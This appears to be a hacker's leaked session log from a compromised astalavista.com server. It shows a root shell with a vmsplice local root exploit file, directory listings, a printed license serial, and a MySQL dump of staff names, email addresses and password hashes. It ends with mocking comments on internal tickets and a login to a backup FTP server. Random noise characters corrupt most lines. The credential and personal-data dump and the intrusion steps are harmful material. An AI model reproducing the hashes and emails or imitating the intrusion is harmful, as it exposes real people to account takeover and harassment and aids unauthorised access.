drwx–x–x 10 com com 4096 Apr 28 12:40 .
/ M4 z% |9 F1 l# Odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* o6 w% ~% j2 b9 _
drwx—— 2 com com 4096 Jun 4 04:04 backups
- e6 }2 p' u& v- }8 ]: u-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql4 B \8 j8 `# m1 b) Q4 T0 M
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
- Q- {7 ~" }$ U0 O) n0 G$ X-rw——- 1 com com 21880 Jun 2 08:07 .bash_history1 Y h% w: Y! R) o- x% q
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
2 d" d/ ^2 z2 l& x: A2 u; A1 \: z' }-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile4 o/ y8 x% M. |, Q
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
. C) W$ A" e1 a+ C- A: S- o \drwx–x–x 3 com com 4096 Jan 29 2008 domains
7 E6 V" L: j4 b; q, s2 G ^-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed, s( }! P# A4 H, ?
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
5 m: V# I* e1 z2 I! Q-rw——- 1 com com 69 Nov 18 2008 .lesshst
# f3 `0 |0 L9 Y, C' wdrwx—— 2 com com 4096 Sep 24 2007 mail5 }% q L; i7 g1 R
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
, y! R P7 C4 t9 Y6 Kdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
6 i, G0 `) e1 z- s+ K% j6 xlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
! d! }* ?3 F2 u3 `-rw-r—– 1 com mail 34 Sep 24 2007 .shadow) `; E. ~5 O6 ]* K. ?& G+ W4 C
drwx—— 2 com com 4096 Aug 26 2008 .ssh$ j% F/ t- m0 `0 C
-rwx—— 1 com com 8515 Feb 10 2008 t
% j: p. ^8 T* i! [& ^-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c- a g% E: f) ]. t" a4 V4 i9 u
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
( M: o4 s' C) Q, g; \) B-rw-rw-r– 1 com com 617 May 20 2008 .toprc. F' k! O& i s; N$ I4 y
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
1 u& q: X( }# J( L5 i-rw——- 1 com com 16629 Mar 28 21:46 .viminfo% O- P" s/ [ ~- I- j: i
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
5 j' ~1 a4 u2 n Q D
6 h2 Q) O, v3 o/ p' _; Nsh-3.2# head t.c
) h2 ?( a7 B0 B& ~/*
6 M6 c$ e- N i: w" G* jessica_biel_naked_in_my_bed.c
7 \! z7 V# C, x# }. e8 ], Q+ E*
8 c/ G, G H" a* z* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
( S; j5 t4 d5 q- y* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.4 G9 O6 s) C1 Q b: k
* Stejnak je to stare jak cyp a aj jakesyk rozbite.4 n) @1 O! I0 u) D, x8 Z5 f9 Z5 I
*- l. D: ^# G) O/ v
* Linux vmsplice Local Root Exploit. w4 q5 b) F3 z8 b4 ~' Z
* By qaaz
8 t/ i6 U% Y" g# x0 g( }*, D$ C j" w6 B! B
3 S0 O: h1 g: M) {6 a; g* U( m
sh-3.2# cd /
( L9 h$ ~, {, D: j% W' Ksh-3.2# ls -la# Y( k& s" r1 Z) [
total 360
. D' W1 R: d7 P3 j" V5 |drwxr-xr-x 25 root root 4096 Jun 3 02:43 .6 b9 x9 {. X" ^0 \8 L7 g9 q
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! I0 }1 M; H& b6 A
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group+ A& w4 |* c* p! S/ h, z
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user+ g6 r. d% Q2 Z( J6 D
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db) m9 J1 i' T% H/ y) f. i
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck# S6 U2 E* N- ^4 n" l. q
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
5 k% q' r9 m8 e5 ]8 l+ t5 b7 cdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
! U+ ?% e: p Q: { B0 mdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin: ~! u6 U0 z6 v6 A. T5 ]; j
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot. h g5 u6 q7 u; G5 V+ ~
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
8 [) ?0 c0 @2 pdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
* A1 ~7 i$ j0 o3 |drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
( B! H9 X, h+ c4 V8 @-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
7 I6 ^0 v L% A, ?6 Ydrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib/ ~ G+ w; O$ i( C7 |1 E% q
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
y* X/ J7 `( B odrwx—— 2 root root 16384 Sep 11 2007 lost+found! X$ ]2 f! p' \) E: p2 R' g4 Q9 U5 o
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media, d; I* P2 q$ E& j# I1 L
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc+ |; s/ j/ b! ~
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
L2 Z$ h3 q0 W9 e7 B9 z# m; ^-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg8 G6 o# u$ W3 a0 n7 l5 d( ~
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
' ~$ N4 L6 H$ O* t+ D5 ?2 A+ D; Q3 T2 `drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
& ]- z2 f1 N5 V2 o8 ?0 v1 C( W9 ^dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
- ^& P, l6 d$ V7 J \drwxr-x— 15 root root 4096 Jun 4 08:40 root' ~0 ~* ?# n0 }$ l; p
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin! P3 O M0 s3 [6 T. m
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux2 U" V7 u1 m1 U7 B
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv, O) O# V' l3 y0 K; z0 \7 b
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys5 k) ?! V( V! n
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
3 C2 K( x( [3 W- Q! ]; ~0 t+ i; ]drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr9 v& B* a4 v: P" o* H2 w( D
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var& Q' z! n8 @& w! Y! |# c
1 q* C) Y) Y) X+ U
sh-3.2# cd opt( W( R, r/ x2 \- _3 K
sh-3.2# ls -la" j+ a x) B6 f/ |% @# a
total 20
3 W1 ~6 H7 g2 M" T# O: @drwxr-xr-x 3 root root 4096 Mar 11 17:56 .: f5 |! j) E. T5 {7 q8 H& J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- G& p$ _; f0 |# A7 j4 Mdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws3 Z7 |9 _/ ?7 K5 F I& Q
& d- x: ]( a* v9 K- c7 a
sh-3.2# cd lsws/
5 t5 }9 U- P" Nsh-3.2# ls -la
0 p- ` _6 P4 |6 t% ktotal 108% d, Y, p% ^; J v8 @+ v
drwxr-xr-x 15 root root 4096 Mar 20 2008 .& o0 x& q, }6 r5 B' L- _+ }) \/ s
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
9 K# e+ @+ k R+ H9 Sdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons/ _' j# K) ]$ H) \& M
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
; o. B) T; q9 M! G" u4 J0 D1 Cdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
' M0 U* W, \' d/ ~8 V7 _- b" Ddrwxr-xr-x 2 root root 4096 May 29 15:10 bin* O e0 d w- j
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
. s' T+ R+ I: G1 `0 o) x$ z! O# _drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT! V+ g8 B5 H/ X$ P; H/ F# Q
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs: \ ~; R( \ Y# Y5 X
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
1 N1 W( p9 X u% c; vdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
- e+ B5 T& ~" a4 R* n-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
" w% e+ m* V! F# g* n: C7 D/ \& `-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP5 ^8 r! N B# Z6 Z
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL( c* X/ d1 ~+ h% o- E1 P' i
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
" r H5 H5 _8 B v- zdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs2 y/ n" U$ f) b8 C" G5 x# u/ p
drwxr-xr-x 2 root root 4096 Mar 20 2008 php7 q5 B6 v2 b1 l Z1 g$ g; X
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
1 b7 l3 Z& J2 V9 k" l9 qdrwxr-xr-x 3 root root 4096 Mar 20 2008 share7 q/ \# q" i$ a" d' Q
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
& Z8 u9 y4 y4 V) S. |
# c% A: L7 ^$ X. O Esh-3.2# cd conf
& j& v# e' \4 _2 ]% u3 K& ^ R# l( ash-3.2# ls -la
' o& H6 z( }: k. Ktotal 48
7 {! y( e7 u5 ^8 J: \/ i) Kdrwx—— 4 apache apache 4096 Jun 3 02:43 .
! a* k F7 r6 \- k8 ~drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
- ~0 _5 ^; d7 }7 P! s$ y; [drwx—— 2 apache apache 4096 Mar 20 2008 cert# W9 g7 h8 @4 }2 i& ^
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml0 d# E( e- s( A
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
( I# ^( x& i% J' ]/ z-rw-r–r– 1 root apache 0 Jun 3 14:11 .last7 X1 ?$ Z; d b6 f
-rw——- 1 apache apache 256 May 29 15:10 license.key! q$ |& o5 Z7 R2 |
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old& P4 v! Q- [8 f% f
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties3 }& e& D' ?% u$ T' q
-rw——- 1 apache apache 20 May 29 15:10 serial.no5 s' f+ S8 j% u4 u( O$ H: M
drwx—— 2 apache apache 4096 Mar 20 2008 templates
3 Q2 Q; K7 J7 M5 B, O% S) H3 @" f8 F, h! Z. ~
sh-3.2# cat serial.no' W3 u. S3 Y3 @& r* V0 }1 V
IbDl-oVsO-CKqL-wVRa! T& t" ~1 o1 w1 I) u; \
. S; p; E4 I2 @% M6 C( Hsh-3.2# mysql5 g( B9 Y2 S" U0 l7 N" O" F' j/ y
Welcome to the MySQL monitor. Commands end with ; or \g.
# V2 q. Y W6 V' Q, `" lYour MySQL connection id is 2868445 H) j3 d' E" L) V$ \% D
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 [ I9 k4 C2 p+ L3 B8 _
) C$ A8 W2 K* m( W7 f: M/ R6 ~Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 ^; M. l- u8 i
% b9 s d& P4 O1 Mmysql> show databases;7 _: G Y4 `. D' U- M0 w% u
+———————–+
' u- ?" f: [ S3 m, l% ?| Database |
) _. w( e: I* B# X. Z8 A+———————–+
6 O* Q. Z# C0 N8 a0 r# U" R& ~/ E| information_schema |
( }8 `! b8 [3 B7 [# Y| astanet_ads |
, b* P" t' ~+ s| astanet_mailing_lists |3 g( u; C6 _- a, @( r7 j2 }- ^( M- b
| astanet_mediawiki |' B: u3 \/ J' ~
| astanet_membersystem |
% @2 T6 y s0 K' T6 h, v8 c0 f| com_contrexx |
2 V3 x# t& T+ q9 r$ I/ F' {| com_contrexx2 |
# |/ A3 [' e: g1 ]2 c: ^$ }: l| com_contrexx2_live |
+ ^/ C. z8 V: h1 L| da_roundcube |
% t# q. X B* q4 a| dolphin |6 X8 V4 u/ s: h
| ideapool |
( F8 \2 H* `7 v( p0 [ A3 L3 _% l3 J| mysql |' R4 y& z3 ~, M& t7 D
| test |! ^2 c; P6 r1 A1 A
| yourmaster |
1 s' a/ G2 l6 w6 o: M0 b; u B( p9 j+———————–+
" z% h8 I# Z$ o7 g14 rows in set (0.00 sec)
0 u7 C/ ]6 m* ?1 ^' S, I8 J, E
1 Y9 k! B0 `! e& V# B7 f" zmysql> use ideapool
: ]* Y0 ?- [4 r, B( H& UDatabase changed
& N5 @" o( `3 a) E, l$ `! _" bmysql> show tables;
2 ]! c9 d3 u- Q1 ~" D1 O+———————————–+: E5 D" v' [ ^; l
| Tables_in_ideapool |# M4 U) I8 f- P' P8 m
+———————————–+
' S- A* Q) m9 M$ v9 w: G| eventum_columns_to_display |
# i) u3 t8 w. N" s' v3 a% c) }| eventum_custom_field |
. `5 M6 m) e7 |6 n) I8 G4 k5 l2 q| eventum_custom_field_option |( w; @6 z7 C- h+ S
| eventum_custom_filter |. Q0 ~& x" t3 K0 ?( x
| eventum_customer_account_manager |
! f' s: p& ]- c, @) E" b| eventum_customer_note |
9 ^3 w$ c v! h$ K5 J) @! A. L: D| eventum_email_account |
5 [$ B% d5 C5 n% l; ^7 l| eventum_email_draft |
# p$ E0 i, S3 k/ N' S| eventum_email_draft_recipient |7 ~* S) U* e' ^" A% }
| eventum_email_response | I& y& j# J/ c% u
| eventum_faq |
, @, H( S- R1 X| eventum_faq_support_level |
- W! A" V5 J! q" ^1 P| eventum_group |) T3 D% Y$ ]( x+ i- g
| eventum_history_type |
: e$ ]6 Q) @/ [| eventum_irc_notice |
, G7 V: Y! k: P' M* ]| eventum_issue |% d9 T5 C6 k+ q9 h& Q( e& Y) M
| eventum_issue_association |
6 `: f# ~6 g. Z3 ^( S7 @| eventum_issue_attachment |
! R: r9 e9 {. z3 X* X- w# o+ @! G| eventum_issue_attachment_file |0 L% t' m, f9 @7 h8 [' |. t) e* S
| eventum_issue_checkin |$ ?' S4 o, B: u2 y- t* N
| eventum_issue_custom_field |. e' S9 T; {! B O/ V/ k
| eventum_issue_history |
, Z* H( I* n. o3 G| eventum_issue_quarantine | f+ o7 z# e. [5 h
| eventum_issue_requirement |
3 f1 g- g& s: @: m n% x: r# E| eventum_issue_user |; f8 ~/ x. Z0 I; K5 r
| eventum_issue_user_replier |' W) E' c" f5 }7 O/ ^& m; c b
| eventum_link_filter |
$ B5 r' M6 j7 J3 R+ H| eventum_mail_queue |/ ^& K4 A7 s4 O. Y/ U- s
| eventum_mail_queue_log |: P p9 l$ z3 `. z
| eventum_news |; w/ W& G/ J. C/ c* J
| eventum_note |/ P; F+ P- A2 u/ R
| eventum_phone_support |( G7 g% `+ {, ?% z7 T
| eventum_project |
; o- o7 ?6 U; U2 k& v| eventum_project_category |: M/ S4 H- y, C" H
| eventum_project_custom_field |+ x' K/ o6 ~9 I C
| eventum_project_email_response |
2 E4 w) r$ L; M( q| eventum_project_field_display |: w6 z7 ~1 N- V! K' \+ H+ |1 {
| eventum_project_group |
5 q+ r0 m6 W8 u4 i' o; V2 V| eventum_project_link_filter |
$ j7 p5 c, `# D6 \ i| eventum_project_news |
* C! x- G( K) [; ]: Y| eventum_project_phone_category |* E+ X+ O$ \+ P- Q( z4 g& j
| eventum_project_priority |
8 s, w% A4 |9 [5 `| eventum_project_release |
* }( L# Q: z6 o| eventum_project_round_robin |
4 L5 y$ e* |+ t: t$ y| eventum_project_status |4 `3 x1 z$ p5 ], b, f
| eventum_project_status_date |/ V2 ^ T6 W: c$ P3 o
| eventum_project_user |* `% ~" {+ q; g
| eventum_reminder_action |
3 _0 O/ J( C# k0 S| eventum_reminder_action_list |
2 [! N; _ ?3 K. u0 c1 ^& a| eventum_reminder_action_type |
4 q5 Q5 c5 B" ?2 G) z6 A| eventum_reminder_field |) `% ] O# x3 H G& C4 Y& R3 H( w
| eventum_reminder_history |
; T x+ ]. G' \7 w| eventum_reminder_level |% A+ O$ T" @/ `& L0 T
| eventum_reminder_level_condition |' V0 ~! T4 d/ ^! E$ P
| eventum_reminder_operator |
0 D8 @: M) _1 m0 E6 C9 h| eventum_reminder_priority |
$ H) L% F! A# K| eventum_reminder_requirement |
: D9 ]' P' _" _6 z4 M( b| eventum_reminder_triggered_action |. s5 g- w6 m$ a2 _
| eventum_resolution |
0 b& |6 j, d5 d2 @3 V2 p| eventum_round_robin_user |) N; R h4 X% v- a: _
| eventum_search_profile |* y1 H& U6 S; r% k2 u$ _9 ^
| eventum_status |3 d5 L3 }: u( j4 a* [% `- e- O( S
| eventum_subscription |
' x6 l: L1 _# i) S- g& L3 g0 v0 Q| eventum_subscription_type |& r* h* P" ]9 _6 @
| eventum_support_email |
) g! \5 F- S/ h# h| eventum_support_email_body |
$ m( }4 _) c- r" d$ f| eventum_time_tracking |2 \( ?% X/ M, d4 x" P6 t5 A
| eventum_time_tracking_category |1 m; o- c" k1 `7 c
| eventum_user |
6 P, d% b; R* m$ l, m8 [1 |( H+———————————–+8 F+ l* n5 n' G# c1 |1 y& g
69 rows in set (0.00 sec)
$ ?4 t* i) _+ J0 F+ ]( K
, ?; I8 T+ g1 l; p5 Umysql> describe eventum_user;
, X0 h1 W- B( z" p/ V, u' X+————————-+——————+——+—–+———————+—————-+
% s7 w P l' T4 t| Field | Type | Null | Key | Default | Extra |
+ h9 C' k2 R. {+ I. d+————————-+——————+——+—–+———————+—————-+3 q0 S: k/ N& D8 O/ d. j
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
+ ]4 V$ h, {8 d& Q| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
5 u- ^2 X5 A! O9 {$ }1 I$ U0 m| usr_customer_id | int(11) unsigned | YES | | NULL | |4 D9 x* C& k* B) `$ ?/ S
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |9 V% k! |3 n: R/ E6 t( P2 I" k9 W
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
( y) g7 y( Y: U+ U9 Z| usr_status | varchar(8) | NO | | active | |
! X+ t# Y9 `- X6 x( `| usr_password | varchar(32) | NO | | | | x" _8 O6 t/ H- o% f
| usr_full_name | varchar(255) | NO | | | |' B; `* R l, `1 }6 d2 U* d
| usr_email | varchar(255) | NO | UNI | | |
2 \# c+ |, m; V+ i e. X" u' || usr_preferences | longtext | YES | | NULL | |
, i4 j- a0 `) e0 H% g% f' O; O| usr_sms_email | varchar(255) | YES | | NULL | |
; }5 L8 F% |+ \0 }3 g% h| usr_clocked_in | tinyint(1) | YES | | 0 | |
$ j9 j+ |% p# d" s" }4 M& [5 _| usr_lang | varchar(5) | YES | | NULL | |- m/ R6 l: w% Q! t! }! z4 @
+————————-+——————+——+—–+———————+—————-+& m. \1 Z7 J* f2 u. f
13 rows in set (0.00 sec)" ^% w$ Q! @- }; H' G8 T
! {0 w- E7 J8 q1 _7 ?( wmysql> select usr_full_name,usr_email,usr_password from eventum_user;
$ v1 L$ m8 F# _( u, f+———————-+——————————-+———————————-+9 q6 {: c: c' ?+ [
| usr_full_name | usr_email | usr_password |
9 z3 i4 |5 D8 ^! j+———————-+——————————-+———————————-+
+ h0 W) v/ R% o! z5 i. F0 I0 k| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
- }( e' ~+ b( ]| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |0 m1 {& o' c& F( ]( u" I
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
- `) \! Y4 F- a7 d5 j1 [| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
F0 m, V% w0 D" E4 t/ H| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
# g. _1 M6 q0 n3 T| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
) ^) u5 m& E& i ]! w" B| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |9 j$ H& m. I. ?
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |8 ^( U9 t( S& \0 \$ K! o0 E
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
; h4 I! n/ g) j* {. v, g9 i& `& L| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
, x2 g0 l7 x1 p| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |% @+ f9 O' \0 i$ P! S
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |/ D' y2 A4 r5 Q! a
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
% a7 K( A2 }' d z+ }8 g| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |7 J$ T+ V2 {7 G9 o" t
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
* q5 b( Q1 Y/ ]% E, l+———————-+——————————-+———————————-+7 F2 C# h9 N, s% L0 r$ u+ c- G4 u j
15 rows in set (0.00 sec): Q5 B3 z: a! r9 y& ?7 l
9 {7 f# w5 m$ Q5 }9 E2 \
mysql> select iss_description from eventum_issue where iss_id = 43;
4 R4 U' C2 P9 B2 r0 P Z$ Z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
4 n( z# `* K1 ]| iss_description
) U( \1 e( H8 |& ^* N& a|" m) S% }4 b( o* `, s3 i$ `
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+5 O- l* p6 T/ j6 L
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
& M$ a: R8 w7 v, Tconnected for 90 mins… 120mins… so what i propose is something like:" l3 r- V0 {: ?% `& D. F7 d, F
链接标记[url]http://www.surfthechannel.com/[/url]
6 _- g t, e" I$ r6 Xsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system. S' D4 \4 {4 E- h m2 y$ Y
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t$ Q: U6 @3 g n d
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off3 l' T- \0 H9 b/ c5 Z7 G- |$ O
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…8 G s/ V/ f0 g
4 V; g4 j8 s( |5 |We could also put advertisement during play on the flash video player itself… extra $$… q' k1 h) F' V* W4 ~
+ W$ |0 b2 q' c+ b/ G3 D" z0 Z/ |By sykadul |3 o4 J, _' V& f: r
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) K [6 |# Q& a
1 row in set (0.00 sec)
4 w( I3 z3 s- I0 A) c9 ~& j) R" h K# M; p& g
// Money and extra $$ is all they care about. remember that.9 e: a Q( r/ j0 m
8 ^2 G: w% }' ]5 F* o1 lmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
& f0 W' B; R) h: t& ?- P C+————————+——————————————————————————————————————————————————————————————————————————————-+1 D/ |( s' `" v2 w1 F; S
| iss_summary | iss_description 2 c6 W: i# X/ R8 Q' Z6 {8 ?
|
4 ~+ E! {* O8 x# }9 y7 }+————————+——————————————————————————————————————————————————————————————————————————————-+# x: G1 c! Q1 t; ~' k: H; n+ b
| Forum for REAL EXPERTS | Hello,
' t1 c L# {- ], U$ V- T' I9 m& O5 T" R
Ishtus and I,
# {# I: I9 ], ~ M" ]$ s, S
5 ^% b0 q$ V# S0 CCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide, J; J5 u, O, G9 ~% z% j! K
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
3 \; D, C, F( w* F1 q1 O
- A, W- Q( @) a8 OOne example a friend of mine from coresecurity.com!# q: b! ]2 J" g0 N
% e( g* \* l1 N$ V7 a" NWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..* l: X! k7 D8 c2 Y6 f
# x1 y d: ~5 G1 Z( z|
: u- h7 n7 Y; M5 I T4 ]+————————+——————————————————————————————————————————————————————————————————————————————+
; f7 V% s" d) ~7 c1 o) J1 row in set (0.00 sec)3 b( ~! o. q, c! }" ?% E
, a; p* i# W. ?( ?3 y
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…: q. F. [7 l/ P h: D1 |
% Z7 P! a) E8 H. }+ N& imysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
1 Y# f o4 E6 P* L2 r* ]7 r+——————+———————————————————————————————+8 J' @! V8 _' R% v3 d) H
| iss_summary | iss_description |
. p5 N( V/ O' G) o) S+——————+———————————————————————————————+
& j. c! a, D8 | E9 q3 o5 n8 T| Website guidance | Virtual Girl which guides you trought the website.
0 T1 m, @) _0 l0 o4 w9 Y; L9 r) `5 u1 B5 S5 _
We need a girl with who you can ( talk )!!!; q ^8 b9 S; z/ q, ~1 z! m
Also for the News!
- C2 U- O0 Z& h/ u uSo my suggestion is a girl who read you the news loud if you like!: @4 n1 X6 p8 e2 P: d
you can choose between read yourselfe or she read it for you or both!
W1 y, C$ e. d$ N3 d* }# @0 |. `
# {6 ^' [% c0 g/ b0 D% |! d( rGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
' @4 m0 r5 x$ W" w; A2 c
" N$ B- i; Y6 z/ g! @. GHave a look on the example girls!!8 y6 r1 d4 e ^$ @
" a1 M: I2 {8 R
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
( r5 N- ]+ i7 n: ~: ~6 L& h# K5 C4 o4 ?) h. O% g& l' o2 x
or that e4 ^ F1 t: R7 C; n6 f, c3 T
$ J8 S$ I- j5 b, r9 h; ?% o9 ]+ ]链接标记[url]http://www.yellostrom.de/[/url]: k1 }" g3 _5 g+ L8 r) M
+ G4 e( r- O, ~5 z$ @
|
5 o9 Z* g5 |' }5 V7 `* a+——————+———————————————————————————————+8 L* W( a8 N: @
1 row in set (0.00 sec)* V" c9 _1 F0 D; [1 V
- H% ~4 j2 J. v& s% B1 z% a" T0 `// ha ha.2 I4 p1 H9 \) ^9 r5 j \# X
# ^4 y. [- m' |$ Amysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
7 O; f) h- D" J5 P& G# ^+————————–+———————————————————————————————————–+
0 t9 \+ L! ~4 l; s. v6 w. i' k4 }5 g| iss_summary | iss_description |4 p" M8 ~: t4 i4 r- A1 e/ i J/ z
+————————–+———————————————————————————————————–+
8 |. i6 E- F" t/ q" W' E| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |2 m; M% X& d) E0 e
+————————–+———————————————————————————————————–+3 n+ \9 Y( o& A
1 row in set (0.00 sec)# J+ Y, [, J; d, {
. l5 n- U9 C: I" h# G) A// LOL.
5 G( E- R3 H% F8 u; y" M. Z7 H8 @0 Q3 I
mysql> exit
$ f" U/ K2 g, d# B+ f8 zBye! Y5 I0 X! C' V9 W* i% \
) D& k0 e D6 a0 i8 D9 F
sh-3.2# ftp 212.254.194.163- @- H% U1 v% ~* {. j( w
Connected to 212.254.194.163.! |% T4 i$ `- g4 e
220 BackupCOM_VW FTP server ready.
$ s7 k) U- G7 m4 m504 AUTH: security mechanism ‘GSSAPI’ not supported.) R. X6 t7 l5 j7 C* l
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported. p3 f4 M$ @4 z
KERBEROS_V4 rejected as an authentication type
6 N+ z; U" h/ S! n9 ^0 _Name (212.254.194.163:root): astalavista.com$ j( i% T* M' V4 V0 j
331 Password required for astalavista.com.
" t* O) z' Y+ X5 b% g) ]Password:
% I1 |9 i" F: \1 l; \& e2 o0 Y230 User astalavista.com logged in.4 U# r. s" x+ M4 ^
Remote system type is UNIX.# z. h! ?) I: N* }! M U' G8 O( P! b- w
Using binary mode to transfer files.
: F" v% t; Y$ {# Q, r2 Pftp> ls -la
4 Z; Z' {7 Z2 [& F1 q7 v+ L9 U( ^227 Entering Passive Mode (212,254,194,163,2,188)
7 T [ v. U8 Y, N/ l150 Opening BINARY mode data connection for ‘file list’.
3 H& @3 B1 q# g$ i1 gdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
" y$ n' k: R" I* K% [" B4 v1 l226 Transfer complete.9 `+ ]+ Y5 ], [; q/ Y& N
ftp> cd astalavista.com
6 e' Y, J' ]+ P' j% m3 Y! ?250 CWD command successful.
9 m2 a: u; A+ pftp> ls -la
. J( s8 U/ c! L' \0 j( R2 z227 Entering Passive Mode (212,254,194,163,2,189)
* t7 T' s8 `! T1 h150 Opening BINARY mode data connection for ‘file list’. k7 k& I+ u' o/ T0 w% G( d5 D
